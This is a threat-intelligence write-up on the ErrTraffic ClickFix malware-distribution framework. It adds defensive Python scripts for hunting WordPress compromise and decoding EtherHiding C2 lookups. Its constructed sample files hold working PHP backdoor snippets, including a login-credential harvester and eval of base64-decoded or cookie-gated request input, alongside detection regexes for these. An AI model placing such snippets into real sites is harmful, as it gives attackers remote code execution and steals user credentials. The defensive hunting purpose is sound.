ErrTraffic: ClickFix Malware-as-a-Service Distribution Framework Delivering Infostealers and Loaders via Compromised WordPress and EtherHiding Polygon C2 — Threadlinqs Intelligence
Threat ID: TL-2026-0817 · Severity: HIGH · Status: ACTIVE · Category: MALWARE
Attribution: LenAI · FINANCIAL
ErrTraffic is a Malware-as-a-Service ClickFix distribution framework that injects malicious JavaScript into compromised WordPress sites to deliver fake BSOD/reCAPTCHA/Cloudflare Turnstile lures.
ErrTraffic is an industrialized ClickFix malware-distribution framework operated as a Malware-as-a-Service (MaaS) and documented by Sekoia.io's Threat Detection & Research team in June 2026. The framework is distributed by the threat actor 'LenAI', who has advertised it on the Exploit.IN cybercrime forum and Telegram since December 2025, selling both monthly subscriptions ($300 rising to $380) and full source code ($1,500 rising to $3,000, then $4,500 for lifetime updates).
Initial access to victim infrastructure is achieved primarily through harvested WordPress administrator credentials — frequently stolen by upstream infostealers and surfaced in leak databases — replayed via residential proxies in tight credential-validation bursts (seven geographically distributed IPs validated stolen credentials within an 80-second window on 7 March 2026). After authenticating, operators modify the active theme's functions.php through the legitimate /wp-admin/theme-editor.php interface and deploy PHP backdoors as WordPress MU-plugins (e.g. session-manager.php in the 'Analytics' cluster). An automated toolkit also attempts pre-authentication RCE against the WP File Manager plugin (CVE-2020-25213), though exploitation was observed to be unsuccessful against the analyzed targets.
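The three access paths described above (credential-validation bursts against wp-login.php from many source IPs, file edits through the legitimate theme editor, and probes of the WP File Manager connector) are all visible in ordinary web-server access logs. The script below is an added example, not code from this page or from Sekoia's report: it parses combined-format log lines and flags each pattern. The log lines are constructed (RFC 5737 documentation addresses), the 80-second window mirrors the observed burst, and the five-IP threshold is an assumption to tune against a site's normal login rate; the connector path is the one public exploits for CVE-2020-25213 hit.

```python
"""Hunting ErrTraffic-style initial access in WordPress access logs.

Added example; not code from the Threadlinqs page or from Sekoia's report.
Log lines are constructed; the burst window mirrors the report, the
min_ips threshold is an assumption to tune per site.
"""
import re
from datetime import datetime, timedelta

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

THEME_EDITOR = "/wp-admin/theme-editor.php"
# Connector endpoint targeted by public exploits for CVE-2020-25213.
FILE_MANAGER_CONNECTOR = "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

# Constructed sample: one normal login, a 7-IP burst inside 78 s, one failed
# connector probe, one theme-editor save from a burst IP, one benign page view.
SAMPLE_LOG = """\
198.51.100.7 - - [07/Mar/2026:09:30:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.11 - - [07/Mar/2026:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.12 - - [07/Mar/2026:10:00:12 +0000] "POST /wp-login.php HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
192.0.2.13 - - [07/Mar/2026:10:00:25 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.14 - - [07/Mar/2026:10:00:33 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.15 - - [07/Mar/2026:10:00:48 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.16 - - [07/Mar/2026:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.17 - - [07/Mar/2026:10:01:19 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Mar/2026:10:02:40 +0000] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 403 0 "-" "python-requests/2.31"
192.0.2.16 - - [07/Mar/2026:10:41:07 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Mar/2026:10:45:00 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""


def parse(lines):
    """Yield one dict per well-formed log line, with a parsed timestamp."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], TS_FMT)
            yield d


def credential_bursts(events, window=timedelta(seconds=80), min_ips=5):
    """Sliding-window count of distinct IPs POSTing to wp-login.php.

    Residential-proxy IPs have clean reputation, so the signal is many
    distinct sources hitting the login endpoint inside a short window,
    not any single address. Returns (first_ts, last_ts, ips) per burst.
    """
    logins = sorted((e["ts"], e["ip"]) for e in events
                    if e["method"] == "POST" and e["path"].split("?")[0] == "/wp-login.php")
    windows, start = [], 0
    for end in range(len(logins)):
        while logins[end][0] - logins[start][0] > window:
            start += 1
        ips = frozenset(ip for _, ip in logins[start:end + 1])
        if len(ips) >= min_ips:
            windows.append((logins[start][0], logins[end][0], ips))
    # Keep only maximal IP sets so a growing burst is reported once.
    bursts, seen = [], set()
    for w in windows:
        if w[2] in seen or any(w[2] < o[2] for o in windows):
            continue
        seen.add(w[2])
        bursts.append(w)
    return bursts


def theme_editor_writes(events):
    """A POST to theme-editor.php is a file edit through the legitimate UI."""
    return [(e["ts"], e["ip"]) for e in events
            if e["method"] == "POST" and e["path"].startswith(THEME_EDITOR)]


def file_manager_probes(events):
    """Any hit on the connector is a probe; a 2xx means it likely worked."""
    return [(e["ts"], e["ip"], e["status"]) for e in events
            if e["path"].startswith(FILE_MANAGER_CONNECTOR)]


if __name__ == "__main__":
    evs = list(parse(SAMPLE_LOG.splitlines()))
    for first, last, ips in credential_bursts(evs):
        print(f"burst {first:%H:%M:%S}-{last:%H:%M:%S}: {len(ips)} IPs {sorted(ips)}")
    print("theme-editor writes:", theme_editor_writes(evs))
    print("file-manager probes:", file_manager_probes(evs))
```

The theme-editor write coming from an IP that took part in the burst is the join a hunter wants: it ties the credential replay to the post-authentication file edit. A 403 on the connector probe matches the report's observation that the automated CVE-2020-25213 attempts failed; treat any 2xx there as a compromise until proven otherwise.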
The deployed PHP backdoors are heavily persistent (a seven-layer model in the Analytics cluster that includes a full copy of the MU-plugin stored in the WordPress database, a credential harvester re-injected hourly into wp-login.php, a stub in the theme's functions.php, five scatter PHP files dropped in legitimate directories, disabled automatic updates, and creation of a hidden administrator account). They evade detection by scanning the request User-Agent for security tooling (Wordfence, Sucuri, WPScan, Nessus, Nikto, Burp) and suspending activity for 30 minutes after such tooling is seen, and they expose multiple covert RCE channels (a secret-key GET parameter, an HMAC time-windowed cookie, and a REST API endpoint gated by the X-WP-Session header). The backdoors also perform WooCommerce/Magecart-style payment skimming and host JavaScript visitor-analytics beacons.
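Because the backdoor goes dormant for 30 minutes when it sees a scanner User-Agent, an over-the-wire scan with Wordfence or WPScan can come back clean while the site is still compromised; the on-disk layers are better hunted from the filesystem. The script below is an added example, not code from this page or from Sekoia's report: it walks a WordPress tree and reports MU-plugins (which load without ever appearing as "active"), PHP files in the uploads directory, disabled automatic updates, and source-level indicators modelled on the page's description (User-Agent checks against the tool names, hash_hmac over a time bucket, the X-WP-Session header, request-controlled input next to an exec sink, obfuscated eval, and login fields written to disk or sent out). The sample tree and the indicator regexes are constructed assumptions, not verified signatures; a hit is a lead for manual review.

```python
"""Hunting ErrTraffic-style PHP backdoor persistence on a WordPress install.

Added example; not code from the Threadlinqs page or from Sekoia's report.
The mini WordPress tree built below is constructed so the script runs
offline, and the indicator regexes are assumptions modelled on the page's
description of the backdoor, not verified signatures.
"""
import re
import tempfile
from pathlib import Path

SECURITY_TOOL_UAS = "wordfence|sucuri|wpscan|nessus|nikto|burp"

INDICATORS = [
    # backdoor goes quiet when it sees scanner User-Agents
    ("ua_scanner_evasion", re.compile(
        r"(?s)(?=.*HTTP_USER_AGENT)(?=.*\b(" + SECURITY_TOOL_UAS + r")\b)", re.I)),
    # HMAC over a time bucket = time-windowed cookie/token gate
    ("hmac_time_window", re.compile(r"(?s)hash_hmac\s*\(.*?\b(time|date|microtime)\s*\(")),
    # custom header used to reach a hidden REST endpoint
    ("x_wp_session_header", re.compile(r"X[-_]WP[-_]SESSION", re.I)),
    # request-controlled input in a file that also calls an exec sink
    ("untrusted_input_exec", re.compile(
        r"(?s)(?=.*\$_(GET|REQUEST|COOKIE)\[)(?=.*\b(eval|system|shell_exec|passthru|assert)\s*\()")),
    ("obfuscated_eval", re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    # login fields written to disk or sent out = harvester in wp-login.php
    ("credential_exfil", re.compile(
        r"(?s)\$_POST\[\s*['\"](log|pwd)['\"]\s*\].*?\b(curl_init|file_put_contents|mail|fsockopen)\s*\(")),
    # theme stub pulling a scatter file from a directory that should hold no PHP
    ("include_from_uploads", re.compile(r"\b(include|require)(_once)?\b[^;]*uploads")),
]

# Constructed sample tree: one backdoored site plus a benign plugin file.
SAMPLE_FILES = {
    "wp-config.php": "<?php\ndefine('AUTOMATIC_UPDATER_DISABLED', true);\n",
    "wp-login.php": ("<?php\n// ...core login code...\n"
        "if (isset($_POST['log'], $_POST['pwd'])) {\n"
        "  file_put_contents('/tmp/.c', $_POST['log'].':'.$_POST['pwd'], FILE_APPEND);\n}\n"),
    "wp-content/mu-plugins/session-manager.php": ("<?php\n"
        "foreach (['wordfence','sucuri','wpscan','nessus','nikto','burp'] as $t) {\n"
        "  if (stripos($_SERVER['HTTP_USER_AGENT'] ?? '', $t) !== false) { set_transient('sm_sleep', 1, 1800); exit; }\n}\n"
        "if (hash_hmac('sha256', (string) floor(time() / 600), $k) === ($_COOKIE['s'] ?? '')) { eval($_POST['c']); }\n"
        "if (isset($_SERVER['HTTP_X_WP_SESSION'])) { /* register hidden REST route */ }\n"),
    "wp-content/themes/twentytwentyfive/functions.php":
        "<?php\n@include_once ABSPATH . 'wp-content/uploads/2026/03/cache.php';\n",
    "wp-content/uploads/2026/03/cache.php": "<?php eval(base64_decode($_GET['k']));\n",
    "wp-content/plugins/hello.php": "<?php\n// benign plugin\n",
}


def scan_php(path: Path) -> list:
    """Names of every indicator that matches the file's source."""
    text = path.read_text(errors="replace")
    return [name for name, rx in INDICATORS if rx.search(text)]


def hunt(root: str) -> dict:
    root = Path(root)
    findings = {"mu_plugins": [], "php_in_uploads": [], "indicator_hits": {},
                "auto_updates_disabled": False}
    mu = root / "wp-content" / "mu-plugins"      # auto-loaded, never listed as active
    if mu.is_dir():
        findings["mu_plugins"] = sorted(p.name for p in mu.glob("*.php"))
    uploads = root / "wp-content" / "uploads"    # should never contain PHP
    if uploads.is_dir():
        findings["php_in_uploads"] = sorted(
            p.relative_to(root).as_posix() for p in uploads.rglob("*.php"))
    for p in sorted(root.rglob("*.php")):
        hits = scan_php(p)
        if hits:
            findings["indicator_hits"][p.relative_to(root).as_posix()] = hits
    cfg = root / "wp-config.php"
    if cfg.is_file() and re.search(r"AUTOMATIC_UPDATER_DISABLED['\"]\s*,\s*true", cfg.read_text()):
        findings["auto_updates_disabled"] = True
    return findings


def build_sample_tree() -> str:
    """Write the constructed sample site into a temp dir and return its root."""
    root = tempfile.mkdtemp(prefix="wp-hunt-")
    for rel, body in SAMPLE_FILES.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return root


if __name__ == "__main__":
    import json
    print(json.dumps(hunt(build_sample_tree()), indent=2))
```

Two of the seven layers live in the database rather than on disk and need a DB-side check: the MU-plugin copy (look for large autoloaded wp_options values containing PHP) and the hidden administrator (compare `wp user list --role=administrator` against the known staff list). The hourly re-injection into wp-login.php is simplest to catch with `wp core verify-checksums`, since that file is core and should never differ from the release hash.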
The injected ErrTraffic JavaScript presents ClickFix social-engineering lures (fake Blue Screen of Death, fake reCAPTCHA, and fake Cloudflare Turnstile verification screens). A Traffic Distribution System (TDS) applies geolocation filtering, OS detection (Windows/macOS), HTTP referrer routing, and browser fingerprinting before serving a payload, and tracks visit/delivery/execution statistics. C2 endpoints are resolved using the EtherHiding 'Dead Drop Resolver' technique: the JavaScript queries Polygon blockchain smart contracts (via Quicknode and public JSON-RPC endpoints) whose state stores the current C2 domains, which rotate daily across rare TLDs (.beer, .cfd, .club, .click, .cyou, .lat, .sbs, .shop, .xyz). Payloads and API traffic are obfuscated with Base64, XOR, and RC4. Victims who follow the lure paste and run a PowerShell command (marked with decoy 'Code Verification' comments) that XOR-decrypts and downloads malware, often padded with binary bloating (120+ MB archives) to evade sandboxing.
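The EtherHiding lookup is just a JSON-RPC eth_call against a contract's view function, so an analyst who has captured the request and response from a proxy or browser session can reproduce the resolution offline without touching the chain. The block below is an added example, not code from this page or from Sekoia's report: it builds the eth_call body the resolver would send, decodes the ABI-encoded string that comes back, peels off the Base64 and RC4 layers the page mentions, and flags domains on the rare TLDs listed above. The base64 over RC4 over JSON layering, the key, the contract address, the function selector and the domain names are all constructed for the example and are not indicators from the report; the RC4 and XOR routines are the standard algorithms, included so the decoding runs stand-alone.

```python
"""Reproducing an EtherHiding dead-drop lookup offline.

Added example; not code from the Threadlinqs page or from Sekoia's report.
The layering (ABI string -> base64 -> RC4 -> JSON), key, contract address,
selector and domains are constructed for the example, not report IOCs.
"""
import base64
import json

RARE_TLDS = {"beer", "cfd", "club", "click", "cyou", "lat", "sbs", "shop", "xyz"}


def eth_call_request(contract: str, selector: str, rpc_id: int = 1) -> dict:
    """Body an EtherHiding resolver posts to a Polygon JSON-RPC endpoint.

    eth_call reads contract state without a transaction: no fee, no auth,
    nothing written on chain, and the same body works against any RPC host.
    """
    return {"jsonrpc": "2.0", "id": rpc_id, "method": "eth_call",
            "params": [{"to": contract, "data": selector}, "latest"]}


def abi_encode_string(s: bytes) -> str:
    """ABI encoding of a single `string` return: offset, length, padded data."""
    head = (32).to_bytes(32, "big")
    length = len(s).to_bytes(32, "big")
    padded = s + b"\x00" * (-len(s) % 32)
    return "0x" + (head + length + padded).hex()


def abi_decode_string(result: str) -> bytes:
    """Inverse of abi_encode_string, as applied to the eth_call `result` hex."""
    raw = bytes.fromhex(result[2:] if result.startswith("0x") else result)
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    return raw[offset + 32:offset + 32 + length]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the other layer the page lists (PowerShell stage)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed sample contract state and the response an RPC node would return.
SAMPLE_KEY = b"errtraffic-demo-key"
SAMPLE_CONTRACT = "0x" + "42" * 20           # constructed address, not an IOC
SAMPLE_SELECTOR = "0x1a2b3c4d"               # constructed 4-byte selector
SAMPLE_STATE = {"c2": ["example-lure-1.beer", "example-lure-2.cfd"], "rotates": "daily"}


def fake_contract_state(state: dict, key: bytes) -> str:
    """What the view function would return for this example's layering."""
    blob = base64.b64encode(rc4(key, json.dumps(state).encode()))
    return abi_encode_string(blob)


SAMPLE_RPC_RESPONSE = {"jsonrpc": "2.0", "id": 1,
                       "result": fake_contract_state(SAMPLE_STATE, SAMPLE_KEY)}


def resolve_c2(rpc_response: dict, key: bytes) -> list:
    """Analyst-side decode: ABI string -> base64 -> RC4 -> JSON -> domains."""
    blob = abi_decode_string(rpc_response["result"])
    state = json.loads(rc4(key, base64.b64decode(blob)))
    return state["c2"]


def flag_rare_tld(domains) -> list:
    """Domains whose TLD is one the campaign was seen rotating through."""
    return [d for d in domains if d.rsplit(".", 1)[-1].lower() in RARE_TLDS]


if __name__ == "__main__":
    print(json.dumps(eth_call_request(SAMPLE_CONTRACT, SAMPLE_SELECTOR)))
    c2 = resolve_c2(SAMPLE_RPC_RESPONSE, SAMPLE_KEY)
    print("c2:", c2, "rare-TLD:", flag_rare_tld(c2))
```

On the network side the durable signal is the eth_call body itself: a browser session on a WordPress site that posts `"method":"eth_call"` to a Quicknode or public JSON-RPC endpoint has no legitimate reason to do so, and the `to` address in that body is the per-affiliate contract, which is what lets Sekoia separate the Beer cluster's affiliates from one another even as the resolved domains change daily.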
Sekoia tracks two principal clusters. The 'Analytics' cluster appears to be a single unattributed operator who purchased an older, less-obfuscated source-code version and distributes Vidar exclusively. The 'Beer' cluster is run by LenAI as the MaaS platform itself, onboarding affiliates (e.g. 'tope'/'cybershell_master' tied to the Bintang campaign, and PPI operator 'mtd') who each receive distinct Polygon smart contracts and deliver a wider set of payloads including Stealc, Remus (a Lumma variant), Salat, DanaBot, HijackLoader, and SmokeLoader, alongside AI-themed impersonation campaigns (Google Antigravity, ChatGPT).
Weaknesses (CWE)
CWE-434 (Unrestricted Upload of File with Dangerous Type), CWE-829 (Inclusion of Functionality from Untrusted Control Sphere), CWE-506 (Embedded Malicious Code), CWE-1021 (Improper Restriction of Rendered UI Layers or Frames)
Target sectors: technology, software-development, e-commerce, financial, cryptocurrency, web-services
Target regions: North America, Europe, Australia, Southeast Asia, Global
Detections & IOCs
This threat has 9 detection rules across Splunk SPL, Microsoft KQL and Sigma, and 30 indicators of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier).
Tags: MALWARE, HIGH, threat intelligence, cybersecurity, CVE-2020-25213 · MITRE ATT&CK: T1583, T1586, T1587.001, T1078, T1190, T1195.003, T1189, T1110.004, T1059.001, T1059.007